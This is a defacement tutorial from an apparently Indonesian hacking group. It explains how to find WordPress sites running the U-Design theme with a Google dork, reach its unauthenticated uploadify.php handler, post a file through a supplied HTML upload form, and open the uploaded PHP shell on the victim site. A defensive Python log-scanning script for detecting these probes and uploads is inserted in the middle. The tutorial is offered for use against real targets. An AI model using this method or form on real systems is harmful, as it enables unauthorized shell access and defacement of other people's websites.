Deface poc WordPress Theme Exploit
🚨 Deface PoC / Deface Method: WordPress Theme Exploit (CSRF Vulnerability) 🚨
==================================================
Defacements done with this method can be mirrored..
=========================
Requirements:
1. Data quota..
2. Dork:
#inurl:/wp-content/themes/u-design/
3. Exploit: /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
4. CSRF: (save the script as an HTML file; the `action` placeholder "URL HALAMAN BLANK TADI" means "URL of the blank page from earlier")
<form method="POST" action=" URL HALAMAN BLANK TADI "
enctype="multipart/form-data"><input type="file" name="Filedata" />
<button>Upload?</button><br/>
</form>
=========================
TUTOR: myself (*Mr.CR0n0$*)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ADMIN :@Z5.W1N474
@Keep Alive
_________@Mr Im81 ______________________
_________@The And _______________________
_________@Awhi __________________________
_________@*@nak Wayang* ______________
_________@Mr.Baby Boss☣_______________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Thanks For:- Google.com
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
___★INDONESIA SECURITY LITE★______
____.=SECURITY, SCURED, SCURE=._______
__________________________________________
OK, let's begin.
1. Start by dorking on Google; either a regular search or an image search will do.
2. Once you have a target, enter the exploit path. Example: www.targetsuka.co.li/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
3. If it is vulnerable, the page is usually blank; anything other than a blank page probably means it is not vulnerable.
4. Enter your target URL into an online CSRF tool, choose Filedata as the post name, click next, then upload your file :v
5. If it is vulnerable/successful, the target website returns an empty response, or a number or the word success appears...
6. Access the shell at www.targetsuka.co.li/namafile.php or www.targetsuka.co.li/[path]/namafile.php
7. And ta-da :v the shell has been opened successfully.
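
A defender-side check for the request sequence in steps 3 to 6, as an added example that is not part of the original post: it scans web-server access logs (Combined Log Format assumed) for requests to the upload handler path named above, which the form posts to with no session or nonce, and for `.php` paths first requested by the same client afterwards. The log lines, IP addresses and the function name `find_upload_abuse` are constructed for illustration.

```python
import re

# Combined Log Format (assumed): ip - - [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Upload handler path from this page, under any theme directory or install prefix.
HANDLER = re.compile(
    r'/wp-content/themes/[^/]+/scripts/admin/uploadify/uploadify\.php$', re.I)

def find_upload_abuse(lines):
    """Return (kind, ip, path) findings in log order."""
    seen_php = set()   # .php paths already requested earlier in the log
    uploaders = set()  # clients whose POST to the handler returned 2xx
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        ok = status.startswith("2")
        if HANDLER.search(path):
            if method == "POST" and ok:
                uploaders.add(ip)
                findings.append(("upload_post", ip, path))
            elif method == "GET" and ok:
                # Step 3: a 2xx (typically blank) response shows the file exists.
                findings.append(("handler_probe", ip, path))
            continue
        if path.lower().endswith(".php"):
            # Step 6: a script never requested before, fetched by an uploader.
            if ip in uploaders and path not in seen_php and ok:
                findings.append(("new_php_after_upload", ip, path))
            seen_php.add(path)
    return findings

# Constructed sample log (documentation IP ranges, not real traffic).
H = "/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php"
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
    f'203.0.113.9 - - [10/Oct/2023:10:01:00 +0000] "GET {H} HTTP/1.1" 200 0 "-" "-"',
    f'203.0.113.9 - - [10/Oct/2023:10:01:30 +0000] "POST {H} HTTP/1.1" 200 1 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:10:02:00 +0000] "GET /namafile.php HTTP/1.1" 200 830 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Treat `new_php_after_upload` as a lead, not proof: a legitimate script that simply had not been requested earlier in the log window is flagged too. Any hit is a reason to check whether the handler file exists on disk and to review the web root for unexpected `.php` files.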
==================================================
Thanks.. Good luck trying it out 😉
_________________________________________
Support us at:
*-* https://github.com/4L13199
*-* https://www.youtube.com/channel/UCidraw5qmidD0B8_LoP7Zhw
*-* http://kumandroid.ml
*-* https://defacer.id/archive/team/Indonesia-Security-Lite